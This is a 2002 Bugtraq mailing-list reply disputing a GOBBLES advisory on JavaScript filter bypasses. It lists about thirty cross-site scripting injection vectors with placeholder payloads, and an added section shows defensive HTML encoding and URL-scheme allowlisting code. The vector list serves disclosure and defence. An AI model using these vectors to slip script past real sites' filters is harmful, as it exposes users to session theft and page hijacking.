[25439] in bugtraq
Re: GOBBLES SECURITY ADVISORY #33
daemon@ATHENA.MIT.EDU (Andrew Clover)
Sat May 11 19:21:18 2002
Date: Sat, 11 May 2002 15:04:46 +0000
From: Andrew Clover <and@doxdesk.com>
To: bugtraq@securityfocus.com
Message-ID: <20020511150446.A2580@doxdesk.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.43.0205100832290.18396-100000@mail.securityfocus.com>; from da@securityfocus.com on Fri, May 10, 2002 at 12:44:48PM -0600
> Only hotmail security historians like those at GOBBLES Security know of
> obscure feature in JavaScript language that make it easy to bypass thing
> like "<...>", "<script>...</script>", and "javascript:" filter for CSS
> attack using JavaScript.
This is a well-known problem and has been posted to Bugtraq before, e.g.:
http://online.securityfocus.com/archive/1/50782
http://online.securityfocus.com/archive/1/27386
JavaScript entities were an idiotic mistake, and have not made it into the
ECMAScript spec. Only older Netscapes support them: Netscape 6/Mozilla does
away with them, thankfully. IE has never implemented them.
> Until now, that encoding information was private knowledge of the
> underground.
Oh, puh-lease. Some of us here can actually read RFCs, you know.
> HTML string completion / HTML closure
> Doesn't need much coverage since it pretty obvious to anyone with
> rational mind.
Quite so. Doesn't need *any* coverage really. All strings must be
HTML-encoded on output to HTML, and that includes " escaping as
well as &.
Sure, lots of people get this wrong, but then lots of people are idiots,
and even if you understand the issues it's easy to let one vulnerability
slip through. This is not news.
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with. I've replaced all angle
brackets with double-round-brackets in case any AV software is feeling
particularly sensitive.
((a href="javascript#[code]"))
((div onmouseover="[code]"))
((img src="javascript:[code]"))
((img dynsrc="javascript:[code]")) [IE]
((input type="image" dynsrc="javascript:[code]")) [IE]
((bgsound src="javascript:[code]")) [IE]
&((script))[code]((/script))
&{[code]}; [N4]
((img src=&{[code]};)) [N4]
((link rel="stylesheet" href="javascript:[code]"))
((iframe src="vbscript:[code]")) [IE]
((img src="mocha:[code]")) [N4]
((img src="livescript:[code]")) [N4]
((a href="about:((script))[code]((/script))"))
((meta http-equiv="refresh" content="0;url=javascript:[code]"))
((body onload="[code]"))
((div style="background-image: url(javascript:[code]);"))
((div style="behaviour: url([link to code]);")) [IE]
((div style="binding: url([link to code]);")) [Mozilla]
((div style="width: expression([code]);")) [IE]
((style type="text/javascript"))[code]((/style)) [N4]
((object classid="clsid:..." codebase="javascript:[code]")) [IE]
((style))((!--((/style))((script))[code]//--))((/script))
((![CDATA[((!--]]))((script))[code]//--))((/script))
((!-- -- --))((script))[code]((/script))((!-- -- --))
((((script))[code]((/script))
((img src="blah"onmouseover="[code]"))
((img src="blah))" onmouseover="[code]"))
((xml src="javascript:[code]"))
((xml id="X"))((a))((b))<script))[code]</script));((/b))((/a))((/xml))
((div datafld="b" dataformatas="html" datasrc="#X"))((/div))
[\xC0][\xBC]script))[code][\xC0][\xBC]/script)) [UTF-8; IE, Opera]
> but there can only be one CSS king, and that king is GOBBLES.
That's nice dear.
--
Andrew Clover
mailto:and@doxdesk.com
http://and.doxdesk.com/
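The encoding rule stated in the reply (every string is HTML-encoded on output, including " and &, not just < and >) and the javascript:/mocha:-URL entries in the list are illustrated below by an added example; it is not code from the original post or from its author. The function names escapeHtml, attr, safeUrl and renderLink are chosen here, and the set of allowed URL schemes is an assumption about what a given application needs. Encoding & also defeats the Netscape 4 &{...}; entity vector, while the second half shows the caveat that encoding alone cannot stop a javascript: URL, because that string contains no HTML-special characters at all.

```javascript
// Added example (not from the original post): output encoding for HTML text
// and attribute contexts, plus a scheme allowlist for URL-valued attributes.

// Encode the five characters that can terminate a text node or a quoted
// attribute value. Covering " and & (not only < and >) is the point of the
// reply: a " closes a quoted attribute so a new attribute can follow, and a
// raw & lets some browsers reinterpret what follows as an entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[c]);
}

// Render an attribute as name="value". The value is always quoted and always
// encoded, so an injected quote cannot start a second attribute.
function attr(name, value) {
  return `${name}="${escapeHtml(value)}"`;
}

// Encoding does nothing for href/src: href="javascript:..." is well-formed
// HTML with no special characters. Allow only the schemes the application
// needs (assumption: http, https, mailto) and replace anything else.
const SAFE_SCHEMES = /^(https?:|mailto:)/i;
const ANY_SCHEME = /^[a-z][a-z0-9+.-]*:/i;

function safeUrl(url) {
  // Browsers drop tab/CR/LF anywhere in a URL and ignore leading C0 controls
  // and spaces, so normalise the same way before looking at the scheme;
  // otherwise "java\nscript:" would slip past the check.
  const normalised = String(url)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+/, '');
  if (SAFE_SCHEMES.test(normalised)) return normalised;
  // No scheme at all: a relative URL, which cannot select a script handler.
  if (!ANY_SCHEME.test(normalised)) return normalised;
  // Any other scheme (javascript:, vbscript:, mocha:, livescript:, ...).
  return 'about:blank';
}

// Build a link from untrusted text and an untrusted URL.
function renderLink(text, url) {
  return `<a ${attr('href', safeUrl(url))}>${escapeHtml(text)}</a>`;
}

// Constructed sample input, as a stand-alone demonstration.
console.log(renderLink('Home & more', 'https://example.com/?q=1&r=2'));
console.log(renderLink('click', '  java\nscript:[code]'));
```

The two halves address different failure modes: escapeHtml/attr keep untrusted data inside the text or attribute value it was placed in (the string-closure cases in the list), while safeUrl handles attributes whose whole value is interpreted by the browser as a URL, where the data never needed to break out of anything.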